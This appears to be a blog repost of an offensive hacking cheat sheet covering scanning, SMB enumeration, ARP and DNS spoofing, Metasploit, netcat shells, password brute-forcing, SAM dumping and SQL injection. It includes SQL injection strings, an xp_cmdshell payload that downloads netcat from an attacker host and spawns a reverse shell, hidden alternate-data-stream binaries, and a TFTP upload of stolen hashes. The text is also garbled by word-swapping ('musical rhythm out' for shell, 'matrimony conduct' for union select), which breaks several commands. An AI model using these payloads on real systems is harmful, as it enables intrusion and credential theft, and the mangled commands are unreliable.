-->

More Hacking Notes

More Hacking Notes



Networking

Services

Basics

Footprinting

Scanning

Windows Enumeration

ARP Spoofing

Exploits

Metasploit Framework 3
What to exercise afterwards gaining a remote shell

TFTP

Netcat

Passwords

Physical Access

SQL Injection

Alternate Data Streams

A White Hat’s Pen Test

Before y'all begin, modify your origin password using passwd.

Networking
dhcpcd                 -get a novel IP address

Renew dynamic IP address:
dhcpcd -k              -release IP address
ifconfig eth0 up          -bring upwardly the NIC
dhcpcd                                    -get a novel IP address
Static IP address:
ifconfig eth0 192.168.0.100/24          -set IP address & sub internet mask
road add together default gw 192.168.0.1      -set default gateway
echo nameserver 192.168.0.1 > /etc/resolv.conf         -set DNS server

Services:
Apache server:
apachectl start             -start server on TCP port 80
apachectl stop             - halt server

SSH server:
sshd-generate              -generate ssh keys
/usr/sbin/sshd               -start server on TCP port 22
pkill sshd                     -stop server
ssh user@targetIP

TFTP server:
atftpd --daemon --port 69 /tmp/          -start server on UDP port 69 amongst a origin directory of tmp                
pkill tftpd                                            -stop server

VNC server:
Vncserver                    -start server on TCP port 5901
pkill Xvnc                   -stop server

Check what ports are listening:
netstat –ant                             -show listening TCP ports
netstat –anu                             -show listening UDP ports
netstat -ant | grep 22               -verify ssh has started
netstat -anu | grep 69               -verify tftp has started

1.                  Basics

Mount a local difficult drive:
mountain /dev/hda1 /mnt/hda1
ls -l /mnt/hda1

Mount a Windows network share:
part <user> <targetIP> <remote share>
part admin 10.1.1.2 c$
Enter a password for the remote share.
ls -l /mnt/share/
umount /mnt/share                  -umount share

Edit a file:
nano test.sh                 -create a novel file too opened upwardly it
<ctrl> x                       -exit
Y                                 -save modified buffer
<enter>                        -write changes
chmod 755 test.sh       -make the file executable
./test.sh                        -run the file

Compile a program:
gcc -o newname exploit.c
gcc -o dcom 66.c
./dcom

Install a novel program:
tar zxvf program.tar.gz                       -method 2:  bzip2 -cd program.tar.bz2 | tar xvf -
cd to the novel plan folder
./configure
make
su root
brand install

Footprinting
Whois:
whois target.com                     -contact info, emails, dates, call servers
ping www.target.com             -IP address of spider web server
whois targetIP                         -network range

DNS:
dig target.com whatever

A
PTR
NS
SOA
SRV
MX

host -l target.com <name server>                    -zone transfer
Scanning

scanrand -b10M targetIP:quick
nmap:
-sS                   - TCP SYN scan or Stealth, one-half opened upwardly (default)
-sU                  - UDP scan
-sT                   - TCP total connect (very noisy)
-PN                  - don't ping
-n                     - no contrary DNS lookup
-A                    - combines -O too -sV
-O                    - OS fingerprinting
-sV                  - service version (banner)
-p                     - ports to scan (T:port,U:port)
-T                     - timing (0-5) paranoid, sneaky, polite, normal, aggressive, insane
-iL                   - input listing of hosts to scan
-oG                  - grepable output to a file
nmap -sS -PN -n targetIP
nmap -sU -PN -n targetIP
nmap -sT -PN -n targetIP -A -p opened upwardly ports -T5 -oG scan.txt
nmap -sS -p 135,139,445 targetIP
nmap -sS -p T:1433,U:1434 targetIP

AMAP:
Take the results from nmap too cheque for services on uncommon ports.
amap -i scan.txt

OS Fingerprinting:

p0f -i eth0 -U –p                     - operate interface eth0, don’t display unknown signatures, promiscuous
point a browser to the targetIP           - read traffic on p0f
xprobe2 -B targetIP

Banner Grabbing

nc targetIP port                       - cheque if the port is open
nc 10.1.1.2 80

telnet targetIP port                  - telnet may yield slightly dissimilar results
HEAD /HTTP/1.0
<enter 2x>

wget targetIP              -
downloads the index.html file
cat index.html | more  - stance file i page at a time, infinite bar for adjacent page
q                                  -quit or instruct out file


Windows Enumeration

nmap -sS -p 139,445 targetIP

cd /pentest/enumeration/smb-enum
nbtscan -f targetIP                  - cheque to run into if NetBIOS is enabled
smbgetserverinfo -i targetIP   -
name, OS too workgroup
smbdumpusers -i targetIP       - listing users
smbclient -L //targetIP            -
listing shares

Using Windows
net operate \\targetIP\ipc$ "" /u:""                         - get-go a NULL session
net stance \\targetIP                                          - stance shares

smbclient:
smbclient -L hostName -I targetIP                 - enumerate shares
smbclient -L hostName/share -U ""                - connect to opened upwardly part amongst a blank user name
smbclient -L hostName -I targetIP -U admin             - connect to opened upwardly part amongst user call admin

RPCclient
rpcclient targetIP -U “”           - start a NULL session
netshareenum                          - enumerate shares
enumdomusers                        - enumerate users
lsaenumsid                              - enumerate domain SIDs
queryuser RID            - user info, endeavour 500, 501, 1000, 1001
createdomuser             - create user account

 ARP Spoofing

ettercap:
nano /usr/local/etc/etter.conf
Under the Linux section, uncomment both lines nether iptables .

Sniff > Unified sniffing > Network interface: eth0 > OK
Hosts > Scan for hosts (do this 2 times)
Hosts > Hosts list
Select the default gateway > Add to Target 1
Select the target > Add to Target 2
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing

dsniff -i eth0
urlsnarf -i eth0
msgsnarf -i eth0
driftnet -i eth0

dns spoofing:
nano /usr/local/share/ettercap/etter.dns
Edit the Microsoft lines (target URL) to redirect to the attacker.

Plugins > Manage the plugins > dns_spoof
Mitm > Arp poisoning > Sniff remote connections > OK
Start > Start sniffing

Exploits
cd /pentest/exploits/milw0rm
truthful cat sploitlist.txt | grep -i exploit

Some versions may survive written for compilation nether Windows, piece others for Linux.
You tin position the environs yesteryear inspecting the headers.
truthful cat exploit | grep "#include"

Windows:  process.h, string.h, winbase.h, windows.h, winsock2.h
Linux:   arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/sockt.h, sys/types.h, unistd.h

Grep out Windows headers, to leave of absence alone Linux based exploits:
truthful cat sploitlist.txt | grep -i exploit | cutting -d " " -f1 | xargs grep sys | cutting -d ":" -f1 | form -u

Metasploit Framework three

svn update                   -module updates.

Web Interface:
./msfweb                     -opens a browser at http://127.0.0.1:55555

Console:
./msfconsole
help
show exploits              -show all exploits
search <name>            -search for an exploit

use <exploit name>
show options
set <OPTION NAME> <option>                  -set RHOST 10.1.1.2
show payloads
set PAYLOAD <payload name>
exhibit options
set <OPTION NAME> <option>                  -set LHOST 10.1.1.2
show targets
set TARGET <target number>                       -set TARGET 0
exploit                         -you  may demand to run the exploit to a greater extent than than i time for it to work

sessions –l                               -list all sessions
sessions -i <id>                       -sessions –i four , interact amongst session 4
<ctrl> z                                    -detach from session
<ctrl> c                                    -kill a session
Jobs                                         -list exploits jobs running
jobs –K                                    -kill all jobs
Auxiliary scanners:
show auxiliary
use <auxiliary name>
set <OPTION NAME> <option>
run

scanner/discovery/sweep_udp
scanner/smb/version
scanner/mssql/mssql_ping
scanner/mssql/mssql_login

Payloads:
Attacker behind firewall:  bind shell
Target behind firewall:  contrary musical rhythm out


Automated:
db_import_nessus_nbe                       -import Nessus results inward NBE format
db_import_nmap_xml                         -import nmap results inward XML format (-oX)

./start-db-autopwn
su - postgres
cd /pentest/exploit/framework3
./msfconsole
load db_postgres
db_create
db_nmap targetIP                   -run map through the framework too shop results inward database
db_hosts                                  -show hosts discovered
db_services                             -show services running on each host
db_autopwn                            -show options
db_autopwn -t -p –e               -select modules based on opened upwardly ports, exhibit matching exploits, exploit

Command Line Interface:
./msfcli | grep -i <name>                                 -search for an exploit or auxiliary
./msfcli <exploit or auxiliary> S                      -summary info
./msfcli <exploit name> <OPTION NAME>=<option> PAYLOAD=<payload name> E

Payload generator:
./msfpayload <payload> <variable=value> <output type>
S        summary too options of payload
C        C language
P        Perl
y         Ruby
R        Raw, allows payload to survive piped into msfencode too other tools
J         JavaScript
X        executable (Windows only)

./msfpayload windows/shell/reverse_tcp LHOST=10.1.1.1 C

Encode shellcode:
./msfencode <options> <variable=value>

Pipe the output of msfpayload into msfencode, exhibit bad characters too listing available encoders.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -l

Choose the PexFnstenvMor encoder too format the output to C.
./msfpayload linux_ia32_bind LPORT=4444 R | ./msfencode -b '\x00' -e PexFnstenvMor -t c


What to exercise afterwards gaining a remote musical rhythm out

Hostname                    - call of computer
net users                      -list users
net user x hack /add                -add user “x” amongst password “hack”
net user x /add                        -add user “x” amongst NO password
net localgroup                         -list safety groups
net localgroup administrators              -list users inward Administrators group
net localgroup administrators x /add              -add user “x” to Administrator group

Don't operate interactive programs similar FTP from a remote shell.


TFTP

assault box 10.1.1.2
cp /pentest/windows-binaries/tools/nc.exe /tmp/

target box
tftp -i 10.1.1.2 GET nc.exe

TFTP copies files amongst read alone attributes.  So to delete the file: 
        attrib -r nc.exe
        del nc.exe

Netcat

attacker:  10.1.1.1
target:  10.1.1.2

Port scanner:
nc -v -z 10.1.1.2 1-1024                      -scan port 1 to 1024

Chat session:
target:  nc –lvp 4444               - get-go Netcat too heed verbosely on port 4444
attacker:  nc -v 10.1.1.2 4444

Transfer file to target:
target:  nc -lvp 4444 > output.txt
attacker:  nc -v 10.1.1.2 4444 < test.txt

Bind shell:
target:  nc -lvp 4444 -e cmd.exe         -should survive sitting at a ascendence prompt of the target
attacker:  nc -v 10.1.1.2 4444

Reverse shell:
target:  nc -lvp 4444
attacker:  nc -v 10.1.1.2 4444 -e /bin/bash
The target should survive sitting at an invisible ascendence prompt of the attacker. 
You volition non run into a prompt.  Issue whatever linux ascendence to verify.

 Passwords
Word list:
zcat /pentest/password/dictionaries/wordlist.txt.Z > words
cat words | wc -l                                             
About 306,000 passwords.

Brute force:
ftp amongst a user call ftp
hydra -l ftp -P words -v targetIP ftp

pop3 amongst a user call muts
hydra -l muts -P words -v targetIP pop3

snmp
hydra -P words -v targetIP snmp

Microsoft VPN
nmap -p 1723 targetIP
dos2unix words
cat words | thc-pptp-bruter targetIP

WYD:
Use wget to download specific files.
wget -r www.target.com --accept=pdf           -f switch volition read pwdump files
wyd.pl -o output.txt www.target.com/
cat output.txt | more

SAM file:
%SYSTEMROOT%/system32/config            -backup re-create non locked yesteryear the OS
%SYSTEMROOT%/repair


Dumping hashes:
./msfcli exploit/windows/dcerpc/ms03_026_dcom RHOST=targetIP PAYLOAD=windows/meterpreter/bind_tcp E
meterpreter > upload -r /tmp/pwdump6 c:\\windows\\system32\\
meterpreter > execute -f cmd -c
meterpreter > interact x                       -where is is Channel created.
C:\WINDOWS\system32> pwdump \\127.0.0.1

John the Ripper:
Paste the hashes into a novel file.
nano hash.txt
Delete unneeded accounts.
cp hash.txt /pentest/password/john-1.7.2/run/
cd /pentest/password/john-1.7.2/run/
./john hash.txt

Rainbow Tables:
rcrack *.rt -f hash.txt

Physical Access

Mount a NTFS part inward read/write mode:
Boot your box amongst Backtrack.
mount
umount /mnt/hda1
modprobe fuse
ntfsmount /dev/hda1 /mnt/hda1
mount
ls -l /mnt/hda1

Dump the SAM file:
bkhive /mnt/sda1/WINDOWS/system32/config/system system.txt
samdump2 /mnt/sda1/WINDOWS/system32/config/sam system.txt > hash.txt
truthful cat hash.txt

Modify SAM file directly:
chntpw /mnt/sda1/WINDOWS/system32/config/SAM
Blank the password.  *
Do y'all actually wishing to modify it?  y
Write hive files?  y
unmount /mnt/sda1
reboot

SQL Injection

nmap -sS -p 1521 targetIP                              -Oracle
nmap -sS -p T:1433,U:1434 targetIP              -MS SQL
Release                                                            Version of Sqlservr.exe
SQL Server 2000 RTM                                   2000.80.194.0
SQL Server 2000 SP1                                     2000.80.383.0
SQL Server 2000 SP2                                     2000.80.534.0
SQL Server 2000 SP3                                     2000.80.760.0
SQL Server 2000 SP3a                                   2000.80.760.0
SQL Server 2000 SP4                                     2000.80.00.2039
SQL Server 2005 RTM                                   2005.90.1399
SQL Server 2005 SP1                                     2005.90.2047
SQL Server 2005 SP2                                     2005.90.3042

Authentication bypass:
' or 1=1--                                 -minus minus closes the SQL query, everything afterwards it is ignored

Enumerating tabular array names:
' having 1=1--
' grouping yesteryear tabular array having 1=1--
' grouping yesteryear table, table2 having 1=1--
' grouping yesteryear table, table2, table3 having 1=1--

Enumerating column types:
matrimony conduct sum(column) from tabular array --
matrimony conduct sum(column2) from tabular array --

Adding data:
' ; insert into tabular array values('value','value2','value3')--

MS SQL stored procedure:
Output the database information into an html file, that y'all tin stance amongst a browser.
' ; exec sp_makewebtask "c:\Inetpub\wwwroot\test.html", "select * from table" ; --

Run ipconfig on target too write to a file, that y'all tin stance amongst a browser.
' or 1=1; exec master..xp_cmdshell ' "ipconfig" > c:\Inetpub\wwwroot\test.txt' ;--

Upload netcat too spawn a contrary shell.
' or 1=1; exec master..xp_cmdshell ' "tftp -i attackIP GET nc.exe && nc.exe attackIP 53 -e cmd.exe' ; --
attacker:  nc -lvp 53

Alternate Data Streams

Hide netcat within a text file.  Note netcat must survive located inward the electrical current directory.
echo "This is a test" > test.txt
type nc.exe > test.txt:nc.exe
del nc.exe
get-go ./test.txt:nc.exe

A White Hat's Pen Test yesteryear Muts

nslookup
ready type=ns
ready type=mx
nmap -sS
nmap -sU
nc -v target.com 23
snmpenum

Solarwinds
tftp the router config file

Use a perl script to decrypt the passwords
Find internal postal service server inward config file.

nc -n internalserver.com 80

Edit config file to opened upwardly to a greater extent than port on the router, 135,139,445,1000
Use Metasploit to shipping RPC exploit
tftp -i attackIP GET pwdump4.exe
pwdump4.exe \\127.0.0.1>hashes.txt
tftp -i attackIP PUT hashes.txt
Crack hashes amongst rainbow table.
Use Remote Desktop to connect to server.


Hope it comes inward handy inward times of need!
Blogger
Disqus
Pilih Sistem Komentar

No comments

Advertiser